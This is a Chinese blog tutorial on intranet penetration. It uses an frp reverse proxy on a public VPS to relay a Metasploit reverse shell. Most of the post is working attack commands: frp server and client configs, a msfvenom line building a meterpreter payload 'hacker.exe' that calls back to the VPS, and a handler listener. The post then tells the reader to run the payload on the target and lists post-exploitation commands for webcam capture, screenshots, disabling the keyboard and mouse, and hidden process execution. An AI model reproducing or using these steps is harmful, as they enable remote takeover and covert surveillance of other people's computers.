美文网首页
frp反向代理+内网渗透+msf反弹shell

frp反向代理+内网渗透+msf反弹shell

作者: migrate_ | 来源:发表于2019-09-25 11:11 被阅读0次
  1. 实验环境:
  • 目标内网主机(win2003)
  • 公网vps
  • 虚拟机kali
    主思路是:
    公网vps跑frp server
    本地kali跑frp client
    将kali本地端口映射到vps
  1. 下载frp(分为windos和linux,按需求下载)
https://github.com/fatedier/frp/releases
  1. 首先在公网上配置服务端(frps.ini)
[common]
bind_port = 6666
1.jpg
  1. 配置完启动服务端
frps.exe -c frps.ini
2.jpg
  1. 配置客户端
[common]
server_addr = 120.xx.xx.xx  #这里是公网vps的ip
server_port = 6666          #这里的端口要跟服务端的一样

[msf]
type = tcp
local_ip = 127.0.0.1        
local_port = 1234          # 转发给本地的1234端口
remote_port = 1080         #服务端的1080端口转发给本地的1234端口

客户端通过vps的ip和6666端口建立连接,把本地1234端口数据传递给公网的1080端口

3.jpg
  1. 配置完,启动客户端
 ./frpc -c ./frpc.ini
4.jpg
  1. 到这里frp就配置完了,接下来只剩生成木马,监听端口等待目标上线了
  2. msf生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=1080 -f exe > /root/hacker.exe
  1. 监听本地接受数据的端口
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 1234
exploit

详情请看
https://www.jianshu.com/p/5fde59d8e51d

  1. 然后把生成的hacker.exe上传到目标主机运行即可
webcan_snap  #利用摄像头拍照
screenshot   #截屏

uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse  #禁用鼠标
uictl disable keyboard  #禁用键盘

webcam摄像头命令
webcam_list  #查看摄像头
webcam_snap   #通过摄像头拍照
webcam_stream   #通过摄像头开启视频
     
execute执行文件
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

相关文章

网友评论

      本文标题:frp反向代理+内网渗透+msf反弹shell

      本文链接:https://www.haomeiwen.com/subject/hzzryctx.html